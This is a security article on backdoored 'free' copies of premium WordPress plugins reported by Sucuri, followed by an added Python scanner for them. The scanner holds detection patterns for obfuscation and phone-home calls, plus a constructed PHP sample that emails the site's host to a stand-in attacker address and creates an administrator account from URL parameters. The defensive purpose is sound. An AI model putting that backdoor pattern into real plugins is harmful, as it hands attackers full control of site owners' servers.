If you run a WordPress site, and are trying to make some money through it, think twice before installing “free” versions of premium plugins.
Researchers from Sucuri have recently analyzed a couple of third-party websites offering such versions for download, and have discovered more than one plugin equipped with malicious code aimed at hijacking any WP site on which they are installed.
The lure is actually quite clever – it is well known that some people are simply never going to pay for software they think they can get for free. But, unfortunately, they might end up paying another kind of price later on.
What motivated the researchers to do a more in-depth investigation into the matter was finding a “free” SEOPressor plugin installed on a severely infected site they were tasked with cleaning.
After analyzing the plugin’s obfuscated code, they discovered code that emails the URL of the site on which the plugin is installed to the person who modified it. The attacker then visits the site and appends specific parameters to the URL that cause a new admin user to be created (with a password known to the attacker).
“The attacker can now log into WordPress with admin permissions and do whatever he wants with the blog, with the whole site (e.g. injecting a backdoor to some theme or plugin, and then using it to upload malicious files to the server), with the server account (all sites that share the same account can be easily compromised now) and even with the whole server,” the researchers note.
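The backdoor described above combines three things a site owner can look for before activating a plugin obtained from an untrusted source: obfuscated code (`eval`/`base64_decode`), code that sends the site's host name somewhere, and user creation driven directly by raw request parameters. The heuristic scanner below is an added example, not code from the article or from Sucuri; the indicator names, the `scan_source`/`verdict` functions, the line-proximity window and both sample plugin files are constructed for illustration and are not taken from the SEOPressor case.

```python
"""Heuristic scanner for nulled-plugin backdoor indicators in WordPress PHP.

Added example (not part of the article or of Sucuri's tooling). It flags the
pattern the article describes: obfuscated code, a "phone home" that reports
the site's host name, and admin-user creation triggered by URL parameters.
A single indicator is only a reason to review; two related indicators close
together in the file are reported as suspicious.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Indicator name -> regex, matched per line, case-insensitive.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "phone_home": re.compile(
        r"\b(mail|wp_mail|wp_remote_(get|post)|curl_exec|file_get_contents)\s*\(", re.I),
    "site_url_read": re.compile(
        r"(\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]|\b(get_site_url|home_url|site_url)\s*\()", re.I),
    "request_param": re.compile(r"\$_(GET|POST|REQUEST)\s*\[", re.I),
    "user_creation": re.compile(r"\b(wp_create_user|wp_insert_user|wp_update_user)\s*\(", re.I),
    "role_escalation": re.compile(r"\b(set_role|add_role)\s*\(\s*['\"]administrator['\"]", re.I),
}

# Indicator pairs that, when they appear near each other, reproduce the
# described backdoor: request-driven admin creation, or reporting the host.
SUSPICIOUS_PAIRS = [
    ("request_param", "user_creation"),
    ("request_param", "role_escalation"),
    ("phone_home", "site_url_read"),
]


def scan_source(source: str) -> Dict[str, List[int]]:
    """Return {indicator: [1-based line numbers]} for every hit in `source`."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def _near(a: List[int], b: List[int], window: int) -> bool:
    """True if any hit in `a` is within `window` lines of a hit in `b`."""
    return any(abs(x - y) <= window for x in a for y in b)


def verdict(hits: Dict[str, List[int]], window: int = 8) -> str:
    """'suspicious' for a related pair close together, 'review' for lone
    obfuscation, otherwise 'clean'. The window (constructed default) keeps
    a plugin that merely uses home_url() and wp_remote_get() far apart clean."""
    for first, second in SUSPICIOUS_PAIRS:
        if first in hits and second in hits and _near(hits[first], hits[second], window):
            return "suspicious"
    if "obfuscation" in hits:
        return "review"
    return "clean"


def scan_plugin_dir(root: str) -> Dict[str, str]:
    """Scan every .php file under `root`; return {relative path: verdict}."""
    base = Path(root)
    return {str(p.relative_to(base)): verdict(scan_source(p.read_text(errors="replace")))
            for p in base.rglob("*.php")}


# Constructed sample: a benign plugin that reads the site URL but sends nothing.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Example SEO Helper (constructed sample) */
$canonical = esc_url(home_url('/'));
add_action('wp_head', function () use ($canonical) {
    echo '<link rel="canonical" href="' . $canonical . '" />';
});
"""

# Constructed sample: the pattern from the article, written un-obfuscated so
# the indicators are readable. Addresses and parameter names are placeholders.
NULLED_PLUGIN = """<?php
/* Plugin Name: Example SEO Helper (constructed sample with backdoor) */
$h = base64_decode('<obfuscated-payload-placeholder>');
eval($h);
mail('attacker@example.invalid', 'new install', $_SERVER['HTTP_HOST']);
if (isset($_GET['x_admin'])) {
    $uid = wp_create_user('helper', $_GET['x_pass'], 'helper@example.invalid');
    (new WP_User($uid))->set_role('administrator');
}
"""

if __name__ == "__main__":
    # Usage: python scan_plugins.py /path/to/wp-content/plugins
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        for path, result in sorted(scan_plugin_dir(target).items()):
            print(f"{result:10s} {path}")
    else:
        for label, src in (("benign", BENIGN_PLUGIN), ("nulled", NULLED_PLUGIN)):
            print(label, verdict(scan_source(src)), scan_source(src))
```

Run it against `wp-content/plugins` before activating anything downloaded from a third-party site. A `suspicious` verdict is a reason not to activate the plugin and to compare the file against the vendor's original; `review` alone is common in legitimate plugins (inline images, compressed assets) and only warrants a look at what is being decoded. Independently of any scanner, listing the site's administrator accounts after cleanup catches the created user even when the plugin has already been removed.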